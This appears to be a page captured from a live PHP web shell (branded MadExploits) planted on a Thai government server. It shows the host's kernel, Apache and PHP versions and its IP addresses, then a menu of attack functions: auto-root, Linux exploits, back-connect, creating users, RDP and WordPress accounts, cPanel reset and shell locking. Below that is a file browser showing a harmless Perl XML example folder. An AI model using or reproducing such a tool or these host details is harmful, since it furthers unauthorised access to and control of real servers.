Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-XML-Grove-0.46alpha /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
README
947
B
-rw-r--r--
grove.pl
1.43
KB
-rw-r--r--
my-html.html
957
B
-rw-r--r--
my-html.pl
2.16
KB
-rw-r--r--
test-ids.pl
739
B
-rw-r--r--
test-path.pl
837
B
-rw-r--r--
test-sub.pl
660
B
-rw-r--r--
visitor.pl
1.49
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README
$Id: README,v 1.3 1999/02/05 17:54:43 kmacleod Exp $ Copyright (C) 1998 Ken MacLeod See the file COPYING for distribution terms. Grove Examples The following examples are listed in concept order, starting with the first will lead into concepts in the later examples. All examples use XML::Parser. grove.pl Uses the simplest form of XML objects to recursively dump the object tree, similar to the `debug' style of XML::Parser. visitor.pl Uses a visitor class and callbacks to dump the tree. This is similar to the `sub' style of XML::Parser except that it uses generic `visit_element' callbacks instead of by-tag-name callbacks (see my-html.pl for that). my-html.pl, my-html.html Uses a visitor class and by-tag-name callbacks to add new tags to HTML-like documents. This example in particular shows one way to embed Perl code into HTML documents.
Close